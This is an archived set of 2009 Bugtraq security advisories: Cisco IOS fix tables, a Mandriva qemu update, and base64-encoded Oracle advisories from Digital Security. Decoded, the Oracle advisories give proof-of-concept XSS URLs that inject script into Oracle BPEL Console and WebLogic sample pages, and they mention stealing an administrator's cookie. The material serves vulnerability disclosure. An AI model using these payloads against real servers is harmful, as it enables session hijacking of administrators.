|------------+-------------+-------------|
| 12.3JX     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.3T      | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.3TPC    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3VA     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.3XA     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.3XB     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.3XC     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.3XD     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.3XE     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.3XF     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.3XG     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3XI     | first fixed | 12.2(33)SB3 |
|            | in 12.2SB   |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3XJ     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.3XK     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.3XL     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.3XQ     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.3XR     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.3XS     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3XU     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3XW     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.3XX     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.3XY     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.3XZ     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.3YA     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YD     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YF     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YG     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YH     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YI     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YJ     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YK     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YM     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YQ     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YS     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YT     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YU     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YX     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.3YZ     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3ZA     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|  Affected  | First Fixed | Recommended |
| 12.4-Based |   Release   |   Release   |
|  Releases  |             |             |
|------------+-------------+-------------|
| 12.4       | 12.4(16)    | 12.4(23)    |
|------------+-------------+-------------|
| 12.4JA     | 12.4(16b)JA | 12.4(16b)   |
|            |             | JA1         |
|------------+-------------+-------------|
| 12.4JDA    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.4JK     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.4JL     | 12.4(3)JL1  | 12.4(3)JL1  |
|------------+-------------+-------------|
| 12.4JMA    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.4JMB    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(16b)   |
| 12.4JX     | first fixed | JA1         |
|            | in 12.4JA   |             |
|------------+-------------+-------------|
| 12.4MD     | 12.4(15)MD  | 12.4(15)MD2 |
|------------+-------------+-------------|
| 12.4MR     | 12.4(16)MR  |             |
|------------+-------------+-------------|
| 12.4SW     | 12.4(11)SW3 | 12.4(15)T8  |
|------------+-------------+-------------|
| 12.4T      | 12.4(15)T   | 12.4(15)T8  |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.4XA     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.4XB     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.4XC     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.4XD     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.4XE     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.4XF     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.4XG     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.4XJ     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.4XK     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.4XL     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.4XM     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.4XN     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.4XP     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.4XQ     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.4XR     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.4XT     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.4XV     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            |             | 12.4(11)    |
|            |             | XW10;       |
| 12.4XW     | 12.4(11)XW3 | Available   |
|            |             | on          |
|            |             | 22-JAN-2009 |
|------------+-------------+-------------|
| 12.4XY     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.4XZ     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.4YA     | Not         |             |
|            | Vulnerable  |             |
+----------------------------------------+

Status of this Notice: FINAL
===========================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.

A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.

Revision History
===============
+---------------------------------------+
| Revision |                 | Initial  |
| 1.0      | 2009-January-14 | public   |
|          |                 | release  |
+---------------------------------------+

Cisco Security Procedures
========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at 
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco 
security notices. All Cisco security advisories are available at 
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)

iEYEARECAAYFAkluC58ACgkQ86n/Gc8U/uA6vACfY36eBjbCbnJsrnJlOCE0Mr6Y
JqUAn1TVyUvBk8lGTm94F+tvmZy4n3Ke
=cGUi
-----END PGP SIGNATURE-----

From - Wed Jan 14 13:32:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058dc
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39165-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 48AEAEC145
for <lists@securityspace.com>; Wed, 14 Jan 2009 13:25:17 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 5541D2373B9; Wed, 14 Jan 2009 09:17:33 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 25168 invoked from network); 14 Jan 2009 05:17:07 -0000
X-Cloudmark-SP-Filtered: true
X-Cloudmark-SP-Result: v=1.0 c=0 a=FLhA3KDuAAAA:8 a=sMBj6sIwAAAA:8 a=P6ZTSKsteIas8bDiFtMA:9 axgvmEG34sBAjQy0C4A:7 a=O4jKzKBaaklTcMGwGvYOOnwo9fUA:4 a=PRHNZNJDFyAA:10 a=R2VQutpenNgA:10 a=8UiCvUyRy1oA:10
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:008 ] qemu
Date: Tue, 13 Jan 2009 22:47:01 -0700
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1LMyaj-0004iA-BN@titan.mandriva.com>
Status:   


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:008
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : qemu
 Date    : January 14, 2009
 Affected: 2009.0
 _______________________________________________________________________

 Problem Description:

 Security vulnerabilities have been discovered and corrected in
 VNC server of qemu version 0.9.1 and earlier, which could lead to
 denial-of-service attacks (CVE-2008-2382), and make it easier for
 remote crackers to guess the VNC password (CVE-2008-5714).
 
 The updated packages have been patched to prevent this.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2382
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5714
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2009.0:
 502c50a55fdb3e3e8ab0456be79a08b1  2009.0/i586/dkms-kqemu-1.4.0-0.pre1.0.1mdv2009.0.i586.rpm
 bf48619b2f7cb0275d379682a4795dc1  2009.0/i586/qemu-0.9.1-0.r5137.1.1mdv2009.0.i586.rpm
 4fb74c4d8356442ccd9c6ddd063f4191  2009.0/i586/qemu-img-0.9.1-0.r5137.1.1mdv2009.0.i586.rpm 
 5a32fdf2019085e4c3d386bad34b1900  2009.0/SRPMS/qemu-0.9.1-0.r5137.1.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 99f7c6b4de73bcab46664c90ae6edc50  2009.0/x86_64/dkms-kqemu-1.4.0-0.pre1.0.1mdv2009.0.x86_64.rpm
 a22b95b6a4673f1300742b4777c4149b  2009.0/x86_64/qemu-0.9.1-0.r5137.1.1mdv2009.0.x86_64.rpm
 502371419a98b187c9db90e4217242de  2009.0/x86_64/qemu-img-0.9.1-0.r5137.1.1mdv2009.0.x86_64.rpm 
 5a32fdf2019085e4c3d386bad34b1900  2009.0/SRPMS/qemu-0.9.1-0.r5137.1.1mdv2009.0.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJbVFvmqjQ0CJFipgRAjcTAJ4rTf6Icqu1/43aSLb/G0TZbE4IFwCeKQN2
MzEgGFk72/muA0J0kDkvqhc=g6Xd
-----END PGP SIGNATURE-----

From - Wed Jan 14 13:32:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058dd
X-Mozilla-Status: 0001
X-Mozilla-Status2: 10000000
Return-Path: <bugtraq-return-39171-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id ACFCFEC145
for <lists@securityspace.com>; Wed, 14 Jan 2009 13:31:44 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id C73BE1438A1; Wed, 14 Jan 2009 09:32:55 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 30489 invoked from network); 14 Jan 2009 10:23:49 -0000
Date: Wed, 14 Jan 2009 13:45:07 +0300
From: Alexandr Polyakov <alexandr.polyakov@dsec.ru>
X-Mailer: The Bat! (v3.99.29) Professional
Reply-To: Alexandr Polyakov <alexandr.polyakov@dsec.ru>
Organization: Digital Security
X-Priority: 3 (Normal)
Message-ID: <1554988.20090114134507@dsec.ru>
To: bugtraq@securityfocus.com, vuln@secunia.com,
packet@packetstormsecurity.org
Subject: Oracle CPU Jan 2009 Advisories.
MIME-Version: 1.0
Content-Type: multipart/mixed;
 boundary="----------BBCA1ED38A711B4"
Status:   

------------BBCA1ED38A711B4
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Advisories for Oracle CPU January 2009 vulnerabilities Attached.





Polyakov Alexandr
Information Security Analyst
______________________
DIGITAL SECURITY
phone:  +7 812 703 1547
        +7 812 430 9130
e-mail: a.polyakov@dsec.ru  
www.dsec.ru


-----------------------------------
This message and any attachment are confidential and may be privileged or otherwise protected 
from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure 
is strictly prohibited. If you have received this message in error, please notify the sender immediately 
either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence 
via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding 
statements by e-mail unless otherwise agreed. 
-----------------------------------      
------------BBCA1ED38A711B4
Content-Type: text/plain;
 name="[DSECRG-09-001] Oracle Application Server (SOA) Linked  XSS vulnerability.txt"
Content-transfer-encoding: base64
Content-Disposition: attachment;
 filename="[DSECRG-09-001] Oracle Application Server (SOA) Linked  XSS vulnerability.txt"

DQpEaWdpdGFsIFNlY3VyaXR5IFJlc2VhcmNoIEdyb3VwIFtEU2VjUkddIEFkdmlzb3J5ICAg
ICNEU0VDUkctMDktMDAxDQoNCg0KDQpBcHBsaWNhdGlvbjoJCQlPcmFjbGUgQXBwbGljYXRp
b24gU2VydmVyIChTT0EpDQpWZXJzaW9ucyBBZmZlY3RlZDoJCU9yYWNsZSBBcHBsaWNhdGlv
biBTZXJ2ZXIgKFNPQSkgdmVyc2lvbiAxMC4xLjMuMS4wICANClZlbmRvciBVUkw6CQkJaHR0
cDovL3d3dy5vcmFjbGUuY29tDQpCdWdzOgkJCQlYU1MNCkV4cGxvaXRzOgkJCVlFUw0KUmVw
b3J0ZWQ6CQkJMTAuMDEuMjAwOA0KVmVuZG9yIHJlc3BvbnNlOgkJMTEuMDEuMjAwOA0KRGF0
ZSBvZiBQdWJsaWMgQWR2aXNvcnk6ICAgICAgICAxMy4wMS4yMDA5DQpDVkU6ICAgICAgICAg
ICAgICAgICAgICAgICAgICAgIENWRS0yMDA4LTQwMTQNCkRlc2NyaXB0aW9uOiAgIAkJICAg
ICAgICBYU1MgSU4gQlBFTENPTlNPTEUvREVGQVVMVC9BQ1RJVklUSUVTLkpTUCANCkF1dGhv
cjoJCQkgICAgICAgIEFsZXhhbmRyIFBvbHlha292DQoJCQkJRGlnaXRhbCBTZWN1cml0eSBS
ZWFzZWFyY2ggR3JvdXAgW0RTZWNSR10gKHJlc2VhcmNoIFthdF0gZHNlYyBbZG90XSBydSkN
Cg0KDQpEZXNjcmlwdGlvbg0KKioqKioqKioqKioNCg0KTGlua2VkIFhTUyB2dWxuZXJhYmls
aXR5IGZvdW5kIGluICBCUEVMIG1vZHVsZSBvZiBPcmFjbGUgQXBwbGljYXRpb24gU2VydmVy
IChPcmFjbGUgU09BIFN1aXRlKS4gIA0KDQoNCg0KRGV0YWlscw0KKioqKioqKg0KDQoNCkxp
bmtlZCBYU1MgdnVsbmVyYWJpbGl0eSBmb3VuZCBpbiAgQlBFTCBtb2R1bGUuIEluIHBhZ2Ug
QlBFTENvbnNvbGUvZGVmYXVsdC9hY3Rpdml0aWVzLmpzcCAgIGF0dGFja2VyIGNhbiBpbmpl
Y3QgWFNTIGJ5IGFwcGVuZGluZyBpdCB0byBVUkwNCg0KDQoNCg0KRXhhbXBsZQ0KKioqKioq
Kg0KDQoNCmh0dHA6Ly9bbG9jYWxob3N0XTo4ODg4L0JQRUxDb25zb2xlL2RlZmF1bHQvYWN0
aXZpdGllcy5qc3A/Jz48c2NyaXB0PmFsZXJ0KCdEU0VDX1hTUycpPC9zY3JpcHQ+PURTZWNS
Rw0KDQoNCg0KQXR0YWNrZXIgbXVzdCBzZW5kIGluamVjdGVkIGxpbmsgdG8gYWRtaW5pc3Ry
YXRvciBhbmQgZ2V0IGFkbWluaWF0cmF0b3JzIGNvb2tpZS4NCg0KDQpDb2RlIHdpdGggaW5q
ZWN0ZWQgWFNTOg0KDQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQoNCiA8L3RoPg0KICAgICAgICAgICAgICAgICAg
ICA8dGggaWQ9ImFjdGl2aXR5TGFiZWwiIGNsYXNzPSJMaXN0SGVhZGVyIiBhbGlnbj0ibGVm
dCIgbm93cmFwPg0KICAgICAgICAgICAgICAgICAgICA8YSBocmVmPSdhY3Rpdml0aWVzLmpz
cD8nPjxzY3JpcHQ+YWxlcnQoJ0RTZWNSR19YU1MnKTwvc2NyaXB0Pj1EU2VjUkcmb3JkZXJC
eT1sYWJlbCcgY2xhc3M9SGVhZGVyTGluaz4NCiAgICAgICAgICAgICAgICAgICAgICAgIEFj
dGl2aXR5IExhYmVsDQogICAgICAgICAgICAgICAgICAgIDwvYT4NCiAgICAgICAgICAgICAg
ICAgICAgPC90aD4NCg0KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQoNCg0KRml4IEluZm9ybWF0
aW9uDQoqKioqKioqKioqKioqKioNCg0KSW5mb3JtYXRpb24gd2FzIHB1Ymxpc2hlZCBpbiBD
UFUgSmFudWFyeSAyMDA5Lg0KQWxsIGN1c3RvbWVycyBjYW4gZG93bmxvYWQgQ1BVIHBldGNo
ZXMgZm9sbG93aW5nIGluc3RydWN0aW9ucyBmcm9tOiANCg0KaHR0cDovL3d3dy5vcmFjbGUu
Y29tL3RlY2hub2xvZ3kvZGVwbG95L3NlY3VyaXR5L2NyaXRpY2FsLXBhdGNoLXVwZGF0ZXMv
Y3B1amFuMjAwOS5odG1sIA0KDQoNCg0KQ3JlZGl0cw0KKioqKioqKg0KT3JhY2xlIGdpdmUg
YSBjcmVkaXRzIGZvciBBbGV4YW5kZXIgUG9seWFrb3YgZnJvbSBEaWdpdGFsIFNlY3VyaXR5
IENvbXBhbnkgaW4gQ1BVIEphbnVhcnkgMjAwOS4NCg0KaHR0cDovL3d3dy5vcmFjbGUuY29t
L3RlY2hub2xvZ3kvZGVwbG95L3NlY3VyaXR5L2NyaXRpY2FsLXBhdGNoLXVwZGF0ZXMvY3B1
amFuMjAwOS5odG1sIA0KDQoNCg0KDQpBYm91dA0KKioqKioNCg0KRGlnaXRhbCBTZWN1cml0
eSBpcyBsZWFkaW5nIElUIHNlY3VyaXR5IGNvbXBhbnkgaW4gUnVzc2lhLCBwcm92aWRpbmcg
aW5mb3JtYXRpb24gc2VjdXJpdHkgY29uc3VsdGluZywgYXVkaXQgYW5kIHBlbmV0cmF0aW9u
IHRlc3Rpbmcgc2VydmljZXMsIHJpc2sgYW5hbHlzaXMgYW5kIElTTVMtcmVsYXRlZCBzZXJ2
aWNlcyBhbmQgY2VydGlmaWNhdGlvbiBmb3IgSVNPL0lFQyAyNzAwMToyMDA1IGFuZCBQQ0kg
RFNTIHN0YW5kYXJkcy4gRGlnaXRhbCBTZWN1cml0eSBSZXNlYXJjaCBHcm91cCBmb2N1c2Vz
IG9uIHdlYiBhcHBsaWNhdGlvbiBhbmQgZGF0YWJhc2Ugc2VjdXJpdHkgcHJvYmxlbXMgd2l0
aCB2dWxuZXJhYmlsaXR5IHJlcG9ydHMsIGFkdmlzb3JpZXMgYW5kIHdoaXRlcGFwZXJzIHBv
c3RlZCByZWd1bGFybHkgb24gb3VyIHdlYnNpdGUuDQoNCg0KQ29udGFjdDoJcmVzZWFyY2gg
W2F0XSBkc2VjIFtkb3RdIHJ1DQoJCWh0dHA6Ly93d3cuZHNlY3JnLnJ1IA0KCQlodHRwOi8v
d3d3LmRzZWMucnUNCg0KDQoNCg0KDQoNCg=------------BBCA1ED38A711B4
Content-Type: text/plain;
 name="=?windows-1251?Q?[DSECRG-09-002]_Oracle_BEA_Weblogic_10_Linked_SS_vulnerability.txt?="
Content-transfer-encoding: base64
Content-Disposition: attachment;
 filename="=?windows-1251?Q?[DSECRG-09-002]_Oracle_BEA_Weblogic_10_Linked_SS_vulnerability.txt?="

DQpEaWdpdGFsIFNlY3VyaXR5IFJlc2VhcmNoIEdyb3VwIFtEU2VjUkddIEFkdmlzb3J5CSNE
U0VDUkctMDktMDAyDQoNCg0KQXBwbGljYXRpb246CQkJT3JhY2xlIEJFQSBXZWJsb2dpYyAx
MCANClZlcnNpb25zIEFmZmVjdGVkOgkJT3JhY2xlIEJFQSBXZWJsb2dpYyAxMCAgDQpWZW5k
b3IgVVJMOgkJCWh0dHA6Ly9vcmFjbGUuY29tDQpCdWdzOgkJCQlNdWx0aXBsZSBYU1MgVnVs
bmVyYWJpbGl0aWVzIGluIHNhbXBsZXMNCkV4cGxvaXRzOgkJCVlFUw0KUmVwb3J0ZWQ6CQkJ
MTYuMDcuMjAwOA0KVmVuZG9yIHJlc3BvbnNlOgkJMTguMDcuMjAwOCANCkxhc3QgcmVzcG9u
c2U6ICAgICAgICAgICAgICAgICAgMzAuMTAuMjAwOA0KRGVzY3JpcHRpb246ICAgCQkJcmV2
aWV3U2VydmljZSBzYW1wbGUgb2YgV2ViTG9naWMgU2VydmVyLgkNCkRhdGUgb2YgUHVibGlj
IEFkdmlzb3J5OgkxMy4wMS4yMDA5ICANCkF1dGhvcnM6CQkJQWxleGFuZHIgUG9seWFrb3YN
CgkJCQlEaWdpdGFsIFNlY3VyaXR5IFJlc2VhcmNoIEdyb3VwIFtEU2VjUkddIChyZXNlYXJj
aCBbYXRdIGRzZWMgW2RvdF0gcnUpDQoNCg0KRGVzY3JpcHRpb24NCioqKioqKioqKioqDQoN
Cg0KTXVsdGlwbGUgWFNTIFZ1bG5lcmFiaWxpdGllcyBmb3VuZCBpbiBPcmFjbGUgQkVBIFdl
YmxvZ2ljIFNlcnZlciBzYW1wbGVzIHZlcnNpb24gMTAuMiBhbmQgbGF0ZXN0Lg0KDQoNCg0K
RGV0YWlscw0KKioqKioqKg0KDQpWdWxuZXJhYmlsaXRpZXMgZm91bmQgaW4gcmV2aWV3U2Vy
dmljZSBzYW1wbGUgb2YgV2VibG9naWMgU2VydmVyLg0KDQoxLiBMaW5rZWQgWFNTIGZvdW5k
IGluIGNyZWF0ZUFydGlzdF9zZXJ2aWNlLmpzcCBwYWdlLiBWdWxuZXJhYmxlIHBhcmFtZXRl
ciAibmFtZSINCg0KDQpFeGFtcGxlDQoqKioqKioqDQpodHRwOi8vdGVzdHNlcnZlci5jb206
NzAwMS9yZXZpZXdTZXJ2aWNlL2NyZWF0ZUFydGlzdF9zZXJ2aWNlLmpzcD9uYW1lPTxzY3Jp
cHQ+YWxlcnQoJ0RTRUNSRycpPC9zY3JpcHQ+DQoNCg0KMi4gTGlua2VkIFhTUyBmb3VuZCBp
biBhZGRCb29rc19zZXNzaW9uX2VqYjIxLmpzcC4gVnVsbmVyYWJsZSBwYXJhbWV0ZXIgInRp
dGxlIg0KDQoNCkV4YW1wbGUNCioqKioqKioNCmh0dHA6Ly90ZXN0c2VydmVyLmNvbTo3MDAx
L3Jldmlld1NlcnZpY2UvYWRkQm9va3Nfc2Vzc2lvbl9lamIyMS5qc3A/bmFtZT0xMTEmdGl0
bGU9PHNjcmlwdD5hbGVydCgnRFNFQ1JHJyk8L3NjcmlwdD4NCg0KDQozLiBMaW5rZWQgWFNT
IGZvdW5kIGluIGFkZEJvb2tzX3Nlc3Npb25fZWpiMjEuanNwLiBWdWxuZXJhYmxlIHBhcmFt
ZXRlciAicmF0aW5nIg0KDQpFeGFtcGxlDQoqKioqKioqDQpodHRwOi8vdGVzdHNlcnZlci5j
b206NzAwMS9yZXZpZXdTZXJ2aWNlL2FkZFJldmlld19zZXJ2aWNlLmpzcD9jb21tZW50PTEx
MSZyYXRpbmc9PHNjcmlwdD5hbGVydCgnRFNFQ1JHJyk8L3NjcmlwdD4NCg0KNC4gTGlua2Vk
IFhTUyBmb3VuZCBpbiBhZGRCb29rc19zZXNzaW9uX2VqYjIxLmpzcC4gVnVsbmVyYWJsZSBw
YXJhbWV0ZXIgInJhdGluZyINCg0KRXhhbXBsZQ0KKioqKioqKg0KaHR0cDovL3Rlc3RzZXJ2
ZXIuY29tOjcwMDEvcmV2aWV3U2VydmljZS9hZGRSZXZpZXdfc2Vzc2lvbi5qc3A/Y29tbWVu
dD0xMTEmcmF0aW5nPTxzY3JpcHQ+YWxlcnQoJ0RTRUNSRycpPC9zY3JpcHQ+DQoNCjUuIEFs
c28gdGhlcmUgYXJlIGEgY291cGxlIG9mIFhTUyB2dWxuZXJhYmlsaXRpZXMgaW4gUE9TVCBw
YXJhbWV0ZXJzIGluIHNjcmlwdHM6DQoNCg0KaHR0cDovL3Rlc3RzZXJ2ZXIuY29tOjcwMDEv
cmV2aWV3U2VydmljZS9leGFtcGxlc1dlYkFwcC9KV1NfV2ViU2VydmljZS5qc3ANCmh0dHA6
